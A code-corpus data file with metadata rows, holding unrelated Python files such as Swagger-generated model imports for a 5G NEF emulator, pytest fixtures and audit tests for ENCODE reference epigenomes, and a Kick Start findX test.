        journal.mission = dict(self.MISSION)
        self.assertEqual(journal.mission, self.MISSION)
        # The manifest records a (timestamp, value) history entry.
        self.assertEqual(
            journal.manifest["metadata"]["mission"][-1],
            ("2018-08-05T22:33:49.795151Z", self.MISSION),
        )

    def test_set_mission_is_validated(self):
        # Renamed from ``test_set_mission_content_is_not_validated``: the body
        # asserts that a non-dict mission value *is* rejected with ValueError,
        # so the old name contradicted the behavior under test.
        journal = domain.Journal(id="0034-8910-rsp-48-2")
        self._assert_raises_with_message(
            ValueError,
            "cannot set mission with value "
            '"mission-invalid": the value is not valid',
            setattr,
            journal,
            "mission",
            "mission-invalid",
        )
| 41.18042
| 110
| 0.627938
| 3,361
| 29,444
| 5.286522
| 0.081821
| 0.157868
| 0.084815
| 0.100236
| 0.87348
| 0.859973
| 0.82052
| 0.796826
| 0.767729
| 0.736549
| 0
| 0.127452
| 0.250408
| 29,444
| 714
| 111
| 41.238095
| 0.677586
| 0.006385
| 0
| 0.527157
| 0
| 0.009585
| 0.235214
| 0.133523
| 0
| 0
| 0
| 0
| 0.145367
| 1
| 0.113419
| false
| 0
| 0.009585
| 0.001597
| 0.134185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
334cb3d830996f9637c4a2fb5417a9a4efc8e75b
| 4,456
|
py
|
Python
|
evolved5g/swagger_client/models/__init__.py
|
EVOLVED-5G/SDK-CLI
|
0f289c7b21c14c3e349164d21cc78d9b6af0a237
|
[
"Apache-2.0"
] | 3
|
2021-10-19T14:37:14.000Z
|
2021-11-01T10:43:33.000Z
|
evolved5g/swagger_client/models/__init__.py
|
skolome/evolved5g_cli
|
b202a878befe22b8dda66ee05610408777f4f006
|
[
"Apache-2.0"
] | 14
|
2021-11-02T10:30:56.000Z
|
2022-03-10T11:30:59.000Z
|
evolved5g/swagger_client/models/__init__.py
|
skolome/evolved5g_cli
|
b202a878befe22b8dda66ee05610408777f4f006
|
[
"Apache-2.0"
] | 1
|
2021-11-16T16:20:31.000Z
|
2021-11-16T16:20:31.000Z
|
# coding: utf-8
# flake8: noqa
"""
NEF_Emulator
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from evolved5g.swagger_client.models.accumulated_usage import AccumulatedUsage
from evolved5g.swagger_client.models.all_of_ue_create_speed import AllOfUECreateSpeed
from evolved5g.swagger_client.models.all_of_ue_speed import AllOfUESpeed
from evolved5g.swagger_client.models.all_of_ue_update_speed import AllOfUEUpdateSpeed
from evolved5g.swagger_client.models.all_of_u_es_speed import AllOfUEsSpeed
from evolved5g.swagger_client.models.all_of_user_plane_event_report_event import AllOfUserPlaneEventReportEvent
from evolved5g.swagger_client.models.as_session_with_qo_s_subscription import AsSessionWithQoSSubscription
from evolved5g.swagger_client.models.as_session_with_qo_s_subscription_create import AsSessionWithQoSSubscriptionCreate
from evolved5g.swagger_client.models.body_create_user_open_api_v1_users_open_post import BodyCreateUserOpenApiV1UsersOpenPost
from evolved5g.swagger_client.models.body_login_access_token_api_v1_login_access_token_post import BodyLoginAccessTokenApiV1LoginAccessTokenPost
from evolved5g.swagger_client.models.body_reset_password_api_v1_reset_password_post import BodyResetPasswordApiV1ResetPasswordPost
from evolved5g.swagger_client.models.body_update_user_me_api_v1_users_me_put import BodyUpdateUserMeApiV1UsersMePut
from evolved5g.swagger_client.models.cell import Cell
from evolved5g.swagger_client.models.cell_create import CellCreate
from evolved5g.swagger_client.models.cell_update import CellUpdate
from evolved5g.swagger_client.models.gnb import GNB
from evolved5g.swagger_client.models.gnb_create import GNBCreate
from evolved5g.swagger_client.models.gnb_update import GNBUpdate
from evolved5g.swagger_client.models.http_validation_error import HTTPValidationError
from evolved5g.swagger_client.models.location_info import LocationInfo
from evolved5g.swagger_client.models.monitoring_event_report import MonitoringEventReport
from evolved5g.swagger_client.models.monitoring_event_report_received import MonitoringEventReportReceived
from evolved5g.swagger_client.models.monitoring_event_subscription import MonitoringEventSubscription
from evolved5g.swagger_client.models.monitoring_event_subscription_create import MonitoringEventSubscriptionCreate
from evolved5g.swagger_client.models.monitoring_notification import MonitoringNotification
from evolved5g.swagger_client.models.monitoring_type import MonitoringType
from evolved5g.swagger_client.models.msg import Msg
from evolved5g.swagger_client.models.path import Path
from evolved5g.swagger_client.models.path_create import PathCreate
from evolved5g.swagger_client.models.path_update import PathUpdate
from evolved5g.swagger_client.models.paths import Paths
from evolved5g.swagger_client.models.point import Point
from evolved5g.swagger_client.models.qo_s_monitoring_report import QoSMonitoringReport
from evolved5g.swagger_client.models.qos_monitoring_information import QosMonitoringInformation
from evolved5g.swagger_client.models.reporting_frequency import ReportingFrequency
from evolved5g.swagger_client.models.requested_qo_s_monitoring_parameters import RequestedQoSMonitoringParameters
from evolved5g.swagger_client.models.snssai import Snssai
from evolved5g.swagger_client.models.speed import Speed
from evolved5g.swagger_client.models.token import Token
from evolved5g.swagger_client.models.ue import UE
from evolved5g.swagger_client.models.ue_create import UECreate
from evolved5g.swagger_client.models.ue_update import UEUpdate
from evolved5g.swagger_client.models.u_es import UEs
from evolved5g.swagger_client.models.usage_threshold import UsageThreshold
from evolved5g.swagger_client.models.user import User
from evolved5g.swagger_client.models.user_create import UserCreate
from evolved5g.swagger_client.models.user_plane_event import UserPlaneEvent
from evolved5g.swagger_client.models.user_plane_event_report import UserPlaneEventReport
from evolved5g.swagger_client.models.user_plane_notification_data import UserPlaneNotificationData
from evolved5g.swagger_client.models.user_update import UserUpdate
from evolved5g.swagger_client.models.validation_error import ValidationError
| 65.529412
| 144
| 0.898115
| 568
| 4,456
| 6.75
| 0.230634
| 0.172926
| 0.266041
| 0.345853
| 0.525561
| 0.392019
| 0.194053
| 0.144236
| 0.031299
| 0.031299
| 0
| 0.015983
| 0.059246
| 4,456
| 67
| 145
| 66.507463
| 0.898616
| 0.063959
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.019231
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
335b8896fdf029c6a3343b87562bffeb771f09dc
| 15,571
|
py
|
Python
|
src/encoded/tests/test_audit_reference_epigenome.py
|
procha2/regulome-encoded
|
327a097ebb539d1b4770145a598de08b579234f9
|
[
"MIT"
] | null | null | null |
src/encoded/tests/test_audit_reference_epigenome.py
|
procha2/regulome-encoded
|
327a097ebb539d1b4770145a598de08b579234f9
|
[
"MIT"
] | 38
|
2019-03-22T14:11:51.000Z
|
2022-03-30T23:56:09.000Z
|
src/encoded/tests/test_audit_reference_epigenome.py
|
procha2/regulome-encoded
|
327a097ebb539d1b4770145a598de08b579234f9
|
[
"MIT"
] | 2
|
2020-10-01T11:48:07.000Z
|
2021-02-23T06:33:15.000Z
|
import pytest
@pytest.fixture
def reference_epigenome_1(testapp, lab, award):
    """Post a minimal reference epigenome and return the created object."""
    response = testapp.post_json(
        '/reference_epigenome',
        {'award': award['@id'], 'lab': lab['@id']},
    )
    return response.json['@graph'][0]
@pytest.fixture
def reference_experiment_RNA_seq(testapp, lab, award, ileum):
    """Released RNA-seq experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'lab': lab['uuid'],
        'status': 'released',
        'date_released': '2019-01-08',
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'biosample_ontology': ileum['uuid'],
        'assay_term_name': 'RNA-seq',
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def reference_experiment_RRBS(testapp, lab, award, ileum):
    """Released RRBS experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'lab': lab['uuid'],
        'status': 'released',
        'date_released': '2019-01-08',
        'assay_term_name': 'RRBS',
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'biosample_ontology': ileum['uuid'],
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def reference_experiment_WGBS(testapp, lab, award, ileum):
    """Released WGBS (whole-genome bisulfite) experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'biosample_ontology': ileum['uuid'],
        'lab': lab['uuid'],
        'status': 'released',
        'date_released': '2019-01-08',
        'assay_term_name': 'whole-genome shotgun bisulfite sequencing',
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_control(testapp, lab, award, target_control, ileum):
    """Released control ChIP-seq experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'lab': lab['uuid'],
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'status': 'released',
        'date_released': '2019-01-08',
        'biosample_ontology': ileum['uuid'],
        'assay_term_name': 'ChIP-seq',
        'target': target_control['uuid'],
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K27me3(testapp, lab, award, target_H3K27me3, ileum):
    """Released H3K27me3 ChIP-seq experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'lab': lab['uuid'],
        'status': 'released',
        'date_released': '2019-01-08',
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'biosample_ontology': ileum['uuid'],
        'assay_term_name': 'ChIP-seq',
        'target': target_H3K27me3['uuid'],
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K36me3(testapp, lab, award, target_H3K36me3, ileum):
    """Released H3K36me3 ChIP-seq experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'lab': lab['uuid'],
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'status': 'released',
        'date_released': '2019-01-08',
        'biosample_ontology': ileum['uuid'],
        'assay_term_name': 'ChIP-seq',
        'target': target_H3K36me3['uuid'],
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K4me1(testapp, lab, award, target_H3K4me1, ileum):
    """Released H3K4me1 ChIP-seq experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'lab': lab['uuid'],
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'status': 'released',
        'date_released': '2019-01-08',
        'biosample_ontology': ileum['uuid'],
        'assay_term_name': 'ChIP-seq',
        'target': target_H3K4me1['uuid'],
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K4me3(testapp, lab, award, target_H3K4me3, ileum):
    """Released H3K4me3 ChIP-seq experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'lab': lab['uuid'],
        'status': 'released',
        'date_released': '2019-01-08',
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'biosample_ontology': ileum['uuid'],
        'assay_term_name': 'ChIP-seq',
        'target': target_H3K4me3['uuid'],
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K27ac(testapp, lab, award, target_H3K27ac, ileum):
    """Released H3K27ac ChIP-seq experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'lab': lab['uuid'],
        'status': 'released',
        'date_released': '2019-01-08',
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'biosample_ontology': ileum['uuid'],
        'assay_term_name': 'ChIP-seq',
        'target': target_H3K27ac['uuid'],
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K9me3(testapp, lab, award, target_H3K9me3, ileum):
    """Released H3K9me3 ChIP-seq experiment fixture on ileum tissue."""
    payload = {
        'award': award['uuid'],
        'lab': lab['uuid'],
        'status': 'released',
        'date_released': '2019-01-08',
        'biosample_type': 'tissue',
        'biosample_term_id': 'UBERON:349829',
        'biosample_ontology': ileum['uuid'],
        'assay_term_name': 'ChIP-seq',
        'target': target_H3K9me3['uuid'],
        'experiment_classification': ['functional genomics assay'],
    }
    created = testapp.post_json('/experiment', payload, status=201)
    return created.json['@graph'][0]
@pytest.fixture
def target_control(testapp, organism):
    """Target fixture labelled 'Control', investigated as a control."""
    created = testapp.post_json(
        '/target',
        {
            'label': 'Control',
            'target_organism': organism['@id'],
            'investigated_as': ['control'],
        },
    )
    return created.json['@graph'][0]
@pytest.fixture
def target_H3K27me3(testapp, organism):
    """Target fixture labelled 'H3K27me3', investigated as a histone."""
    created = testapp.post_json(
        '/target',
        {
            'label': 'H3K27me3',
            'target_organism': organism['@id'],
            'investigated_as': ['histone'],
        },
    )
    return created.json['@graph'][0]
@pytest.fixture
def target_H3K36me3(testapp, organism):
    """Target fixture labelled 'H3K36me3', investigated as a histone."""
    created = testapp.post_json(
        '/target',
        {
            'label': 'H3K36me3',
            'target_organism': organism['@id'],
            'investigated_as': ['histone'],
        },
    )
    return created.json['@graph'][0]
@pytest.fixture
def target_H3K4me1(testapp, organism):
    """Target fixture labelled 'H3K4me1', investigated as a histone."""
    created = testapp.post_json(
        '/target',
        {
            'label': 'H3K4me1',
            'target_organism': organism['@id'],
            'investigated_as': ['histone'],
        },
    )
    return created.json['@graph'][0]
@pytest.fixture
def target_H3K4me3(testapp, organism):
    """Target fixture labelled 'H3K4me3', investigated as a histone."""
    created = testapp.post_json(
        '/target',
        {
            'label': 'H3K4me3',
            'target_organism': organism['@id'],
            'investigated_as': ['histone'],
        },
    )
    return created.json['@graph'][0]
@pytest.fixture
def target_H3K27ac(testapp, organism):
    """Target fixture labelled 'H3K27ac', investigated as a histone."""
    created = testapp.post_json(
        '/target',
        {
            'label': 'H3K27ac',
            'target_organism': organism['@id'],
            'investigated_as': ['histone'],
        },
    )
    return created.json['@graph'][0]
@pytest.fixture
def target_H3K9me3(testapp, organism):
    """Target fixture labelled 'H3K9me3', investigated as a histone."""
    created = testapp.post_json(
        '/target',
        {
            'label': 'H3K9me3',
            'target_organism': organism['@id'],
            'investigated_as': ['histone'],
        },
    )
    return created.json['@graph'][0]
def test_reference_epigenome_without_required_assays(testapp, reference_epigenome_1):
    """A reference epigenome with no datasets is audited as partial."""
    audit = testapp.get(reference_epigenome_1['@id'] + '@@index-data').json['audit']
    flat_errors = [error for errors in audit.values() for error in errors]
    assert any(
        error['category'] == 'partial reference epigenome' for error in flat_errors
    )
@pytest.fixture
def replicate_RNA_seq(testapp, reference_experiment_RNA_seq, library_1):
    """Replicate 1/1 of the RNA-seq experiment, backed by library_1."""
    created = testapp.post_json(
        '/replicate',
        {
            'experiment': reference_experiment_RNA_seq['@id'],
            'library': library_1['@id'],
            'biological_replicate_number': 1,
            'technical_replicate_number': 1,
        },
    )
    return created.json['@graph'][0]
@pytest.fixture
def replicate_RRBS(testapp, reference_experiment_RRBS, library_2):
    """Replicate 1/1 of the RRBS experiment, backed by library_2."""
    created = testapp.post_json(
        '/replicate',
        {
            'experiment': reference_experiment_RRBS['@id'],
            'library': library_2['@id'],
            'biological_replicate_number': 1,
            'technical_replicate_number': 1,
        },
    )
    return created.json['@graph'][0]
def test_reference_epigenome_with_required_assays(
    testapp,
    reference_epigenome_1,
    reference_experiment_RNA_seq,
    reference_experiment_RRBS,
    reference_experiment_WGBS,
    reference_experiment_chip_seq_control,
    reference_experiment_chip_seq_H3K27me3,
    reference_experiment_chip_seq_H3K36me3,
    reference_experiment_chip_seq_H3K4me1,
    reference_experiment_chip_seq_H3K4me3,
    reference_experiment_chip_seq_H3K27ac,
    reference_experiment_chip_seq_H3K9me3,
):
    """The 'partial' audit flag tracks the release status of required assays."""
    datasets = [
        reference_experiment_RNA_seq['@id'],
        reference_experiment_RRBS['@id'],
        reference_experiment_WGBS['@id'],
        reference_experiment_chip_seq_control['@id'],
        reference_experiment_chip_seq_H3K27me3['@id'],
        reference_experiment_chip_seq_H3K36me3['@id'],
        reference_experiment_chip_seq_H3K4me1['@id'],
        reference_experiment_chip_seq_H3K4me3['@id'],
        reference_experiment_chip_seq_H3K27ac['@id'],
        reference_experiment_chip_seq_H3K9me3['@id'],
    ]
    testapp.patch_json(reference_epigenome_1['@id'], {'related_datasets': datasets})

    def audit_errors():
        # Re-fetch the audit and flatten it across error types.
        audit = testapp.get(
            reference_epigenome_1['@id'] + '@@index-data'
        ).json['audit']
        return [error for errors in audit.values() for error in errors]

    # While one required assay is not released, the epigenome is only partial.
    testapp.patch_json(reference_experiment_RNA_seq['@id'], {'status': 'in progress'})
    assert any(
        error['category'] == 'partial reference epigenome' for error in audit_errors()
    )
    # Releasing that assay clears the audit flag.
    testapp.patch_json(reference_experiment_RNA_seq['@id'], {'status': 'released'})
    assert all(
        error['category'] != 'partial reference epigenome' for error in audit_errors()
    )
def test_reference_epigenome_multiple_biosample_term_names(
    testapp,
    reference_epigenome_1,
    reference_experiment_RNA_seq,
    reference_experiment_RRBS,
    replicate_RNA_seq,
    replicate_RRBS,
    library_1,
    library_2,
    biosample_1,
    biosample_2,
    donor_1,
    donor_2,
    liver,
    heart,
):
    """Datasets whose biosamples use different ontology terms trigger the audit."""
    # Point the two libraries at biosamples from different ontology terms.
    testapp.patch_json(
        biosample_1['@id'],
        {'donor': donor_1['@id'], 'biosample_ontology': liver['uuid']},
    )
    testapp.patch_json(
        biosample_2['@id'],
        {'donor': donor_2['@id'], 'biosample_ontology': heart['uuid']},
    )
    testapp.patch_json(library_1['@id'], {'biosample': biosample_1['@id']})
    testapp.patch_json(library_2['@id'], {'biosample': biosample_2['@id']})
    testapp.patch_json(
        reference_epigenome_1['@id'],
        {'related_datasets': [reference_experiment_RNA_seq['@id'],
                              reference_experiment_RRBS['@id']]},
    )
    audit = testapp.get(reference_epigenome_1['@id'] + '@@index-data').json['audit']
    flat_errors = [error for errors in audit.values() for error in errors]
    assert any(
        error['category'] == 'multiple biosample term names in reference epigenome'
        for error in flat_errors
    )
def test_reference_epigenome_multiple_biosample_treatments(
    testapp,
    reference_epigenome_1,
    reference_experiment_RNA_seq,
    reference_experiment_RRBS,
    replicate_RNA_seq,
    replicate_RRBS,
    treatment,
    library_1,
    library_2,
    biosample_1,
    biosample_2,
):
    """Datasets whose biosamples differ in treatments trigger the audit."""
    # Treat only one of the two biosamples so they disagree.
    testapp.patch_json(biosample_1['@id'], {'treatments': [treatment['@id']]})
    testapp.patch_json(library_1['@id'], {'biosample': biosample_1['@id']})
    testapp.patch_json(library_2['@id'], {'biosample': biosample_2['@id']})
    testapp.patch_json(
        reference_epigenome_1['@id'],
        {'related_datasets': [reference_experiment_RNA_seq['@id'],
                              reference_experiment_RRBS['@id']]},
    )
    audit = testapp.get(reference_epigenome_1['@id'] + '@@index-data').json['audit']
    flat_errors = [error for errors in audit.values() for error in errors]
    assert any(
        error['category'] == 'multiple biosample treatments in reference epigenome'
        for error in flat_errors
    )
| 40.235142
| 100
| 0.541198
| 1,450
| 15,571
| 5.528966
| 0.068966
| 0.104278
| 0.060247
| 0.068105
| 0.852563
| 0.787452
| 0.763128
| 0.759885
| 0.729575
| 0.716852
| 0
| 0.035807
| 0.329202
| 15,571
| 386
| 101
| 40.339378
| 0.731738
| 0
| 0
| 0.676829
| 0
| 0
| 0.226832
| 0.022863
| 0
| 0
| 0
| 0
| 0.015244
| 1
| 0.073171
| false
| 0
| 0.003049
| 0
| 0.137195
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
684fd931660a2c9bf35be0acf6b1ef0563e40de1
| 37
|
py
|
Python
|
densenet/__init__.py
|
cr3ux53c/DenseNet-Tensorflow2
|
208143bf4086c407e524e01cd945fd3b0741b48d
|
[
"MIT"
] | 15
|
2019-06-04T20:49:37.000Z
|
2022-03-03T03:03:00.000Z
|
densenet/__init__.py
|
cr3ux53c/DenseNet-Tensorflow2
|
208143bf4086c407e524e01cd945fd3b0741b48d
|
[
"MIT"
] | null | null | null |
densenet/__init__.py
|
cr3ux53c/DenseNet-Tensorflow2
|
208143bf4086c407e524e01cd945fd3b0741b48d
|
[
"MIT"
] | 9
|
2020-02-09T16:01:10.000Z
|
2022-01-24T19:14:37.000Z
|
from .densenet import densenet_model
| 18.5
| 36
| 0.864865
| 5
| 37
| 6.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
685980a392657e59e028ee8df4fcea56ae6b18f2
| 318
|
py
|
Python
|
duty/__init__.py
|
ximetov/IrCa-Duty
|
666c2d26c9cd7d314798cfb222ad91dfeee4a5b6
|
[
"MIT"
] | 6
|
2020-05-18T21:53:27.000Z
|
2020-07-06T12:48:00.000Z
|
duty/__init__.py
|
ximetov/IrCa-Duty
|
666c2d26c9cd7d314798cfb222ad91dfeee4a5b6
|
[
"MIT"
] | null | null | null |
duty/__init__.py
|
ximetov/IrCa-Duty
|
666c2d26c9cd7d314798cfb222ad91dfeee4a5b6
|
[
"MIT"
] | 6
|
2020-05-13T16:16:15.000Z
|
2020-06-23T12:05:09.000Z
|
from os.path import join, dirname
from .app import app
from duty.objects import __version__
from .iris_listener import __name__
from .icad_listener import __name__
from .longpoll_listener import __name__
from .my_signals import __name__
from .callback_signals import __name__
from .longpoll_signals import __name__
| 24.461538
| 39
| 0.842767
| 45
| 318
| 5.2
| 0.4
| 0.25641
| 0.299145
| 0.282051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125786
| 318
| 12
| 40
| 26.5
| 0.841727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
685a6050758b81a002467be41c25bf7019789ba8
| 145
|
py
|
Python
|
Round A Kick Start 2018/Even Digits (8pts, 15pts)/code/test_findX.py
|
wangyuxiang0829/Google-Kick-Start
|
13146d7887ea72e1c98a49b754b36640668174c4
|
[
"MIT"
] | null | null | null |
Round A Kick Start 2018/Even Digits (8pts, 15pts)/code/test_findX.py
|
wangyuxiang0829/Google-Kick-Start
|
13146d7887ea72e1c98a49b754b36640668174c4
|
[
"MIT"
] | null | null | null |
Round A Kick Start 2018/Even Digits (8pts, 15pts)/code/test_findX.py
|
wangyuxiang0829/Google-Kick-Start
|
13146d7887ea72e1c98a49b754b36640668174c4
|
[
"MIT"
] | null | null | null |
import answer
def test_findX():
    """Spot-check answer.findX against known Kick Start 'Even Digits' cases."""
    expected_by_input = {23522: 22888, 13000: 8888, 2: 2}
    for value, expected in expected_by_input.items():
        assert answer.findX(value) == expected
| 18.125
| 39
| 0.668966
| 20
| 145
| 4.8
| 0.55
| 0.375
| 0.53125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182609
| 0.206897
| 145
| 7
| 40
| 20.714286
| 0.652174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.2
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
686875aa29e7d8ea5641f45a77b1151c0013ad38
| 25
|
py
|
Python
|
sana_pchr/forms/admin/__init__.py
|
SanaMobile/sana.pchr.oss-web
|
2b2fd75a1730f1743e28b4499bb1ba76fa100970
|
[
"BSD-3-Clause"
] | null | null | null |
sana_pchr/forms/admin/__init__.py
|
SanaMobile/sana.pchr.oss-web
|
2b2fd75a1730f1743e28b4499bb1ba76fa100970
|
[
"BSD-3-Clause"
] | null | null | null |
sana_pchr/forms/admin/__init__.py
|
SanaMobile/sana.pchr.oss-web
|
2b2fd75a1730f1743e28b4499bb1ba76fa100970
|
[
"BSD-3-Clause"
] | 2
|
2018-06-07T21:54:08.000Z
|
2018-07-11T20:40:19.000Z
|
from .physician import *
| 12.5
| 24
| 0.76
| 3
| 25
| 6.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d7fba856b779338179132c8a8f4e93af3b23ec19
| 115
|
py
|
Python
|
tests/__init__.py
|
PtitCaius/taskwiki
|
8c4da3a744fd1aa22bfb0369658cecc925e77fd0
|
[
"MIT"
] | 465
|
2015-03-27T09:42:18.000Z
|
2020-07-18T20:35:19.000Z
|
tests/__init__.py
|
PtitCaius/taskwiki
|
8c4da3a744fd1aa22bfb0369658cecc925e77fd0
|
[
"MIT"
] | 272
|
2015-01-10T20:38:02.000Z
|
2020-07-16T12:55:15.000Z
|
tests/__init__.py
|
PtitCaius/taskwiki
|
8c4da3a744fd1aa22bfb0369658cecc925e77fd0
|
[
"MIT"
] | 66
|
2015-03-21T16:33:39.000Z
|
2020-07-12T09:20:29.000Z
|
import os
import sys

# Resolve the repository root (the parent of this tests/ directory) and put
# it at the front of sys.path so the package under test imports directly.
_tests_dir = os.path.dirname(os.path.realpath(__file__))
path = os.path.dirname(_tests_dir)
sys.path.insert(0, path)
| 19.166667
| 67
| 0.756522
| 20
| 115
| 4.15
| 0.45
| 0.216867
| 0.313253
| 0.361446
| 0.385542
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009524
| 0.086957
| 115
| 5
| 68
| 23
| 0.780952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
0bdd64b10c28bc415cc476b1a6964d9232be1916
| 152
|
py
|
Python
|
cacreader/swig-4.0.2/Examples/test-suite/python/keyword_rename_runme.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | 1,031
|
2015-01-02T14:08:47.000Z
|
2022-03-29T02:25:27.000Z
|
cacreader/swig-4.0.2/Examples/test-suite/python/keyword_rename_runme.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | 240
|
2015-01-11T04:27:19.000Z
|
2022-03-30T00:35:57.000Z
|
cacreader/swig-4.0.2/Examples/test-suite/python/keyword_rename_runme.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | 224
|
2015-01-05T06:13:54.000Z
|
2022-02-25T14:39:51.000Z
|
